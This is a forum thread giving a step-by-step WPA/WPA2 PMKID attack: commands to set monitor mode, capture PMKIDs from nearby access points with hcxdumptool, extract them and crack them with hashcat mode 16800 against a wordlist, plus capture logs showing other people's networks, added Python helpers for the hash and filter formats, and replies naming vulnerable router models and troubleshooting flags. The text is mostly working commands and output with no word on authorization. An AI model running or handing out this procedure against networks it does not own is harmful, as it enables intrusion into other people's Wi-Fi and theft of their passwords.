WPA/WPA2 PMKID attack step-by-step (hashcat mode 16800)


freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 1792
Reputation: 5725
Sun, 05 Aug 2018 @ 23:30:31

A new technique has been developed to crack WPA PSK (Pre-Shared Key) passwords: the PMKID attack.

Requirements:

- hcxdumptool v4.2.0 or higher for capturing traffic
- hcxtools v4.2.0 or higher
- hashcat v4.2.0 or higher

With this method, capturing a full EAPOL 4-way handshake is not required. It works against all APs with roaming functions enabled.

Stop unnecessary services:
systemctl stop wpa_supplicant.service
systemctl stop network-manager.service

Start wireless device (wlan1) in monitor mode (do not use virtual interface):
ip link set wlan1 down
iw dev wlan1 set type monitor
ip link set wlan1 up
iw dev

Scan wireless networks. We need only the AP's MAC address.


Capture PMKID using hcxdumptool:
1. Create a MAC filter file (format: 112233445566 + comment; maximum line length 128, maximum 32 entries).
Use filter mode 2 to attack the MAC addresses in the filter file.

2. hcxdumptool -i wlan1 -o hcxdump.pcapng --filtermode=2 --filterlist=filter.txt --enable_status (Ctrl+D stops capturing)

root@Xenon-XR2:~/hcxtools_temporary/20180805# hcxdumptool -i wlan1 -o hcxdump.pcapng --filtermode=2 --filterlist=filter.txt --enable_status

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1
FILTERLIST...............: 1 entries
MAC CLIENT...............: f0a225a4d105 (client)
MAC ACCESS POINT.........: 000dc2f0a2da (start NIC)
EAPOL TIMEOUT............: 1000000
DEAUTHENTICATIONINTERVALL: 20 beacons
GIVE UP DEAUTHENTICATIONS: 10 tries
REPLAYCOUNTER............: 62039
ANONCE...................: af981dd4e9a67a1ec750da8d4609b36670a08296fe2a24462e3c227c33c59162

[20:30:40 - 001] b8ee0e540bf5 -> b4ef39acc15e Telekom-4UJYbz [PROBERESPONSE, SEQUENCE 649, AP CHANNEL 1]
[20:30:41 - 001] 704f57966e24 -> daa119f2a67a TP-Link_6I24 [PROBERESPONSE, SEQUENCE 902, AP CHANNEL 2]
[20:30:41 - 001] 4c5e0cd05175 -> daa119f2a67a freeroute [PROBERESPONSE, SEQUENCE 2147, AP CHANNEL 1]
[20:30:41 - 001] 602e201acd8c -> daa119f2a67a T-1DCD7D [PROBERESPONSE, SEQUENCE 2737, AP CHANNEL 2]
[20:30:41 - 001] daa119f2a67a -> ffffffffffff Szendi [PROBEREQUEST, SEQUENCE 1936]
[20:30:41 - 001] 4e5e0cd05175 -> daa119f2a67a freeroute_VAP [PROBERESPONSE, SEQUENCE 2148, AP CHANNEL 1]
[20:30:50 - 005] 74c63b30d235 -> ffffffffffff TOKI [PROBEREQUEST, SEQUENCE 2052]
[20:30:50 - 005] 10feedc53a40 -> 74c63b30d235 TOKI [PROBERESPONSE, SEQUENCE 151, AP CHANNEL 6]
[20:30:55 - 007] 8416f9b6be78 -> 843835be30d2 TP-LINK_PM [PROBERESPONSE, SEQUENCE 275, AP CHANNEL 8]
[20:30:57 - 007] 001c10bf823f -> 801934413156 DIB [PROBERESPONSE, SEQUENCE 1903, AP CHANNEL 6]
[20:30:57 - 007] 801934413156 -> ffffffffffff TP-LINK_12FC [PROBEREQUEST, SEQUENCE 513]
[20:31:03 - 011] 606dc7a599e9 -> f0a225a4d105 SETUP [PROBERESPONSE, SEQUENCE 1139, AP CHANNEL 11]
[20:31:03 - 011] f0a225a4d105 -> 2c4d5483d610 [AUTHENTICATION, OPEN SYSTEM, SEQUENCE 0, STATUS 1]
[20:31:03 - 011] 2c4d5483d610 -> f0a225a4d105 [AUTHENTICATION, OPEN SYSTEM, SEQUENCE 2593, STATUS 2]
[20:31:06 - 011] 2c4d5483d610 -> 8c34fd4d6b40 Amigo [PROBERESPONSE, SEQUENCE 2625, AP CHANNEL 11]
[20:31:06 - 011] f0a225a4d105 -> 2c4d5483d610 [AUTHENTICATION, OPEN SYSTEM, SEQUENCE 1, STATUS 1]
[20:31:06 - 011] 2c4d5483d610 -> f0a225a4d105 [AUTHENTICATION, OPEN SYSTEM, SEQUENCE 2648, STATUS 2]
[20:31:06 - 011] f0a225a4d105 -> 2c4d5483d610 Amigo [ASSOCIATIONREQUEST, SEQUENCE 0]
[20:31:06 - 011] 2c4d5483d610 -> f0a225a4d105 [ASSOCIATIONRESPONSE, SEQUENCE 2649]
[20:31:06 - 011] 2c4d5483d610 -> f0a225a4d105 [FOUND PMKID]
[20:31:08 - 013] 74d21d35ca63 -> ffffffffffff TP-LINK_4A4558 [PROBEREQUEST, SEQUENCE 1966]
[20:31:08 - 013] 487b6b37d898 -> 74d21d35ca63 T-37D438 [PROBERESPONSE, SEQUENCE 294, AP CHANNEL 13]
[20:31:09 - 013] b4ef39acc15e -> ffffffffffff Telekom-4UJYbz [PROBEREQUEST, SEQUENCE 1806]
^C
terminated...


Strip the PMKID (-z option):

root@Xenon-XR2:~/hcxtools_temporary/20180805# hcxpcaptool -z PMKID.txt -o hcxdump.hccapx -E wordlist -I identitylist -U usernamelist -P PMKlist -T trafficlist *.pcapng
start reading from hcxdump.pcapng

summary:
--------
file name....................: hcxdump.pcapng
file type....................: pcapng 1.0
file hardware information....: i686
file os information..........: Linux 4.16.0-kali2-686-pae
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 45
skipped packets..............: 0
packets with FCS.............: 42
beacons (with ESSID inside)..: 20
probe requests...............: 5
probe responses..............: 11
association requests.........: 1
association responses........: 1
authentications (OPEN SYSTEM): 4
authentications (BROADCOM)...: 2
EAPOL packets................: 2
EAPOL PMKIDs.................: 1

1 PMKID(s) written to PMKID.txt

The content of PMKID.txt file should be: PMKID*MAC AP*MAC Station*ESSID

root@Xenon-XR2:~/hcxtools_temporary/20180805# cat PMKID.txt
f68d151bae4e54e2b97aa80b090218db*2c4d5483d610*f0a225a4d105*4272656e647a73616b

Start hashcat with mode 16800:

root@Xenon-XR2:/usr/local/src/hashcat-4.2.0# ./hashcat32.bin -m 16800 'f68d151bae4e54e2b97aa80b090218db*2c4d5483d610*f0a225a4d105*4272656e647a73616b' /usr/share/wordlists/rockyou.txt

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: f68d151bae4e54e2b97aa80b090218db*2c4d5483d610*f0a22...73616b
Time.Started.....: Sun Aug 5 20:39:51 2018 (2 secs)
......

More info can be found at:
https://hashcat.net/forum/thread-7717-post-41446.html#pid41446
https://hashcat.net/forum/thread-6661-post-41434.html#pid41434


If I helped a +rep is appreciated!

BTC donation: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp
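Added example (not from the post or from the hcxtools/hashcat projects): a Python parser for the PMKID.txt line format given above, PMKID*MAC AP*MAC Station*ESSID, which checks each field's length and decodes the hex-encoded ESSID. The sample line is the one printed in the post; the 1..32 byte SSID limit is the 802.11 one, and the dataclass and helper names are my own.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Sample line copied from the post's PMKID.txt output.
SAMPLE_LINE = "f68d151bae4e54e2b97aa80b090218db*2c4d5483d610*f0a225a4d105*4272656e647a73616b"

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


@dataclass
class PmkidRecord:
    pmkid: str      # 16 bytes as hex (the PMKID is a 128-bit HMAC output)
    mac_ap: str     # 6 bytes as hex, no separators
    mac_sta: str    # 6 bytes as hex, no separators
    essid: bytes    # raw ESSID bytes, decoded from the hex field

    def essid_text(self) -> str:
        # ESSIDs are arbitrary bytes; show undecodable ones escaped.
        return self.essid.decode("utf-8", errors="backslashreplace")


def _hex_field(name: str, value: str, nbytes: Optional[int]) -> str:
    if not HEX_RE.match(value):
        raise ValueError(f"{name}: not hex: {value!r}")
    if len(value) % 2:
        raise ValueError(f"{name}: odd hex length")
    if nbytes is not None and len(value) != 2 * nbytes:
        raise ValueError(f"{name}: expected {nbytes} bytes, got {len(value) // 2}")
    return value.lower()


def parse_pmkid_line(line: str) -> PmkidRecord:
    """Parse one PMKID*MAC AP*MAC Station*ESSID line (hashcat -m 16800 input)."""
    parts = line.strip().split("*")
    if len(parts) != 4:
        raise ValueError(f"expected 4 '*'-separated fields, got {len(parts)}")
    pmkid, mac_ap, mac_sta, essid_hex = parts
    essid = bytes.fromhex(_hex_field("ESSID", essid_hex, None))
    if not 1 <= len(essid) <= 32:   # 802.11 SSID length limit
        raise ValueError(f"ESSID length {len(essid)} out of range 1..32")
    return PmkidRecord(
        pmkid=_hex_field("PMKID", pmkid, 16),
        mac_ap=_hex_field("MAC AP", mac_ap, 6),
        mac_sta=_hex_field("MAC Station", mac_sta, 6),
        essid=essid,
    )
```

Running a file of captured lines through this before handing it to hashcat separates malformed lines (wrong field count, colons left in a MAC, odd hex) from genuine hash-format rejections.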

jojo93
Joined: Sun, 20 May 2018
Posts: 57
Reputation: 60
Sun, 05 Aug 2018 @ 23:48:15

I will test and update you.
Thanks for your effort.


Hashcat2018
Joined: Fri, 27 Jul 2018
Posts: 20
Reputation: 0
Mon, 06 Aug 2018 @ 22:50:45

I have this error in hcxdumptool:

failed to init globals


freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 1792
Reputation: 5725
Mon, 06 Aug 2018 @ 22:59:05

Hashcat2018 said:

I have this error in hcxdumptool:

failed to init globals

What was the command you used?
Check the filterlist file. Correct MAC address format: 112233445566 + comment (without colons).


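Added example (my own code, not from the post or from hcxdumptool) that checks a filter file against the constraints given in the first post and repeated here: one 12-hex-digit MAC without colons at the start of each line, at most 128 characters per line, at most 32 entries. The sample file is constructed; the two valid MACs are taken from the post's output, and the assumption that a comment follows the MAC after whitespace is mine.

```python
import re
from typing import List, Tuple

# Limits stated in the post for hcxdumptool v4.2.0 filter files.
MAX_LINE_LEN = 128
MAX_ENTRIES = 32
MAC_RE = re.compile(r"^[0-9a-fA-F]{12}$")

# Constructed sample file: two valid entries (MACs from the post's output),
# one colon-separated MAC (rejected) and one over-long line (rejected).
SAMPLE_FILTER = (
    "2c4d5483d610 Amigo - lab AP\n"
    "000dc2f0a2da\n"
    "2c:4d:54:83:d6:11 colon form is not accepted\n"
    "000dc2f0a2db " + "x" * 200 + "\n"
)


def normalize_mac(text: str) -> str:
    """Return the 12-hex-digit form of a MAC written with ':' or '-' separators."""
    return re.sub(r"[:\-]", "", text.strip()).lower()


def check_filter_list(content: str) -> Tuple[List[str], List[str]]:
    """Validate filter-file content; return (accepted MACs, problem descriptions).

    Assumed layout (from the post): each non-empty line starts with a
    12-hex-digit MAC, optionally followed by whitespace and a comment.
    """
    accepted: List[str] = []
    problems: List[str] = []
    for lineno, raw in enumerate(content.splitlines(), start=1):
        if not raw.strip():
            continue
        if len(raw) > MAX_LINE_LEN:
            problems.append(f"line {lineno}: {len(raw)} chars, limit is {MAX_LINE_LEN}")
            continue
        mac = raw.split(None, 1)[0]
        if MAC_RE.match(mac):
            accepted.append(mac.lower())
        elif MAC_RE.match(normalize_mac(mac)):
            problems.append(f"line {lineno}: remove separators, write {normalize_mac(mac)}")
        else:
            problems.append(f"line {lineno}: no 12-hex-digit MAC at line start: {mac!r}")
    if len(accepted) > MAX_ENTRIES:
        problems.append(f"{len(accepted)} entries, limit is {MAX_ENTRIES}")
    return accepted, problems
```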

Hashcat2018
Joined: Fri, 27 Jul 2018
Posts: 20
Reputation: 0
Mon, 06 Aug 2018 @ 23:27:21

I do not understand how it is + comment (without colon).
Example please.


freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 1792
Reputation: 5725
Mon, 06 Aug 2018 @ 23:34:02

Try without filter option at first: "hcxdumptool -i wlan1 -o hcxdump.pcapng --enable_status"



Hashcat2018
Joined: Fri, 27 Jul 2018
Posts: 20
Reputation: 0
Mon, 06 Aug 2018 @ 23:37:48

freeroute said:

Try without filter option at first: "hcxdumptool -i wlan1 -o hcxdump.pcapng --enable_status"

OK, thank you very much


vtar
Joined: Wed, 07 Mar 2018
Posts: 79
Reputation: 6
Tue, 07 Aug 2018 @ 00:40:39

Works on TKIP and CCMP?


freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 1792
Reputation: 5725
Tue, 07 Aug 2018 @ 08:26:20

TKIP and CCMP are security (encryption) protocols. It works on both if roaming is enabled.



vtar
Joined: Wed, 07 Mar 2018
Posts: 79
Reputation: 6
Tue, 07 Aug 2018 @ 09:46:02

What do you mean by roaming?


freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 1792
Reputation: 5725
Tue, 07 Aug 2018 @ 11:40:22

https://en.wikipedia.org/wiki/IEEE_802.11r-2008
https://en.wikipedia.org/wiki/Wireless_LAN#Roaming
https://www.draytek.com/en/faq/faq-wlan/wlan.wireless-lan/what-is-wireless-roaming/



freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 1792
Reputation: 5725
Tue, 07 Aug 2018 @ 22:33:31

Video demonstration: https://youtu.be/ve_0Qhd0bSM



kangaroot
Joined: Thu, 07 Dec 2017
Posts: 135
Reputation: 20
Tue, 07 Aug 2018 @ 23:08:04

Tested, works just fine. Thank you for researching.


kangaroot
Joined: Thu, 07 Dec 2017
Posts: 135
Reputation: 20
Wed, 08 Aug 2018 @ 15:26:00

Not sure if this info is useful to anyone, but the following hubs are vulnerable to this attack:

BTHub3 (HuaweiTe)
BTHub4 (Arcadyan)
BTHub6 (Sagemcom)

Also, the attack is successful with the following adapters:

ALFA AWUS036NHA (black) - Atheros AR9271
ALFA AWUS036H (grey) - Realtek RTL8187
ALFA AWUS036NH (green) - Ralink RT2870/RT3070


dark0
Joined: Tue, 13 Feb 2018
Posts: 40
Reputation: 10
Thu, 09 Aug 2018 @ 15:51:26

Tested also, and on BELL_XXX it is working!!


hashbaby
Joined: Thu, 24 Dec 2015
Posts: 113
Team: OneforALL
Reputation: 263
7 days ago

I'm using hcxdumptool 4.2.1 and when using --enable_status I get an error, "requires an argument". I wanted to find out what value I should set?


moved to 4.2.1
enabled hardware handshake instead of software handshake
changed behavior of status:
--enable_status=digit : enables status messages
bitmask:
1: EAPOL
2: PROBEREQUEST/PROBERESPONSE
4: AUTHENTICATION
8: ASSOCIATION


acidfk
Joined: Tue, 10 Jul 2018
Posts: 90
Reputation: 30
7 days ago

hashbaby said:

I'm using hcxdumptool 4.2.1 and when using --enable_status I get an error, "requires an argument". I wanted to find out what value I should set?


moved to 4.2.1
enabled hardware handshake instead of software handshake
changed behavior of status:
--enable_status=digit : enables status messages
bitmask:
1: EAPOL
2: PROBEREQUEST/PROBERESPONSE
4: AUTHENTICATION
8: ASSOCIATION

It really doesn't matter; I use 4, but if the PMKID is found you always get the message.


kevtheskin
Joined: Wed, 21 Feb 2018
Posts: 61
Reputation: 0
6 days ago

freeroute said:

Try without filter option at first: "hcxdumptool -i wlan1 -o hcxdump.pcapng --enable_status"

Hi, what do you add after enable_status?


kevtheskin
Joined: Wed, 21 Feb 2018
Posts: 61
Reputation: 0
6 days ago

Hi all,

Am I missing something here?
root@kali:~# hcxdumptool -o hash -i wlan1mon --filterlist=/root/Desktop/filter.txt --filtermode=2 --enable_status
hcxdumptool: option '--enable_status' requires an argument

If I add 4 after status I get
INTERFACE:...............: wlan1mon
FILTERLIST...............: 4 entries
MAC CLIENT...............: f0a22551eacb (client)
MAC ACCESS POINT.........: 00221cdaeefd (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 63761
ANONCE...................: bbaab63d64aa1d2efdc09c1fc010f58f39cbc134b8173a37398d7eba1c6711d7 .

I don't have

DEAUTHENTICATIONINTERVALL: 20 beacons
GIVE UP DEAUTHENTICATIONS: 10 tries
REPLAYCOUNTER............: 62039

Any info much appreciated
Kev


Hashcat2018
Joined: Fri, 27 Jul 2018
Posts: 20
Reputation: 0
6 days ago

kevtheskin said:

Hi all,

Am I missing something here?
root@kali:~# hcxdumptool -o hash -i wlan1mon --filterlist=/root/Desktop/filter.txt --filtermode=2 --enable_status
hcxdumptool: option '--enable_status' requires an argument

If I add 4 after status I get
INTERFACE:...............: wlan1mon
FILTERLIST...............: 4 entries
MAC CLIENT...............: f0a22551eacb (client)
MAC ACCESS POINT.........: 00221cdaeefd (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 63761
ANONCE...................: bbaab63d64aa1d2efdc09c1fc010f58f39cbc134b8173a37398d7eba1c6711d7 .

I don't have

DEAUTHENTICATIONINTERVALL: 20 beacons
GIVE UP DEAUTHENTICATIONS: 10 tries
REPLAYCOUNTER............: 62039

Any info much appreciated
Kev

Test with hcxdumptool -o hash -i wlan1mon --filterlist=/root/Desktop/filter.txt --enable_status=2


Hashcat2018
Joined: Fri, 27 Jul 2018
Posts: 20
Reputation: 0
6 days ago

Sorry. Mistake


karTEEK
Joined: Sat, 21 Apr 2018
Posts: 119
Reputation: 74
6 days ago

kevtheskin said:

Hi all,

Am I missing something here?
root@kali:~# hcxdumptool -o hash -i wlan1mon --filterlist=/root/Desktop/filter.txt --filtermode=2 --enable_status
hcxdumptool: option '--enable_status' requires an argument

If I add 4 after status I get
INTERFACE:...............: wlan1mon
FILTERLIST...............: 4 entries
MAC CLIENT...............: f0a22551eacb (client)
MAC ACCESS POINT.........: 00221cdaeefd (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 63761
ANONCE...................: bbaab63d64aa1d2efdc09c1fc010f58f39cbc134b8173a37398d7eba1c6711d7 .

I don't have

DEAUTHENTICATIONINTERVALL: 20 beacons
GIVE UP DEAUTHENTICATIONS: 10 tries
REPLAYCOUNTER............: 62039

Any info much appreciated
Kev


Try --enable_status=1.
I tried both 1 & 2; I got PMKIDs only for status 1.


status::::::::cracked

kevtheskin
Joined: Wed, 21 Feb 2018
Posts: 61
Reputation: 0
5 days ago

karTEEK said:

kevtheskin said:

Hi all,

Am I missing something here?
root@kali:~# hcxdumptool -o hash -i wlan1mon --filterlist=/root/Desktop/filter.txt --filtermode=2 --enable_status
hcxdumptool: option '--enable_status' requires an argument

If I add 4 after status I get
INTERFACE:...............: wlan1mon
FILTERLIST...............: 4 entries
MAC CLIENT...............: f0a22551eacb (client)
MAC ACCESS POINT.........: 00221cdaeefd (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 63761
ANONCE...................: bbaab63d64aa1d2efdc09c1fc010f58f39cbc134b8173a37398d7eba1c6711d7 .

I don't have

DEAUTHENTICATIONINTERVALL: 20 beacons
GIVE UP DEAUTHENTICATIONS: 10 tries
REPLAYCOUNTER............: 62039

Any info much appreciated
Kev


Try --enable_status=1.
I tried both 1 & 2; I got PMKIDs only for status 1.

Hi, thanks for the reply. Did you notice that in the video he did not add any number after enable_status?


kevtheskin
Joined: Wed, 21 Feb 2018
Posts: 61
Reputation: 0
5 days ago

Hi all,
I can't get it to find a PMKID. Lots of APs near me, but it's just not working. Any more info please?


Dorky
Joined: Fri, 26 Aug 2016
Posts: 31
Reputation: 0
5 days ago

kevtheskin said:

Hi all,
I can't get it to find a PMKID. Lots of APs near me, but it's just not working. Any more info please?


Can you give more specific information, such as any errors you are receiving? Are you sure you entered monitor mode correctly? Are you trying this attack on WPA/2? Maybe you discovered access points that do not support this kind of attack.


vtar
Joined: Wed, 07 Mar 2018
Posts: 79
Reputation: 6
5 days ago

Maybe you are trying to attack WEP... Lol 😂


karTEEK
Joined: Sat, 21 Apr 2018
Posts: 119
Reputation: 74
5 days ago

kevtheskin said:

Hi, thanks for the reply. Did you notice that in the video he did not add any number after enable_status?


The command in the video did not work for me either!! Remove the filter list option.
This is my command: "hcxdumptool -o test.pcapng -i wlan0 --enable_status=1". Don't forget to keep your adapter in monitor mode.
Check whether your adapter is compatible; btw, not all routers are vulnerable.




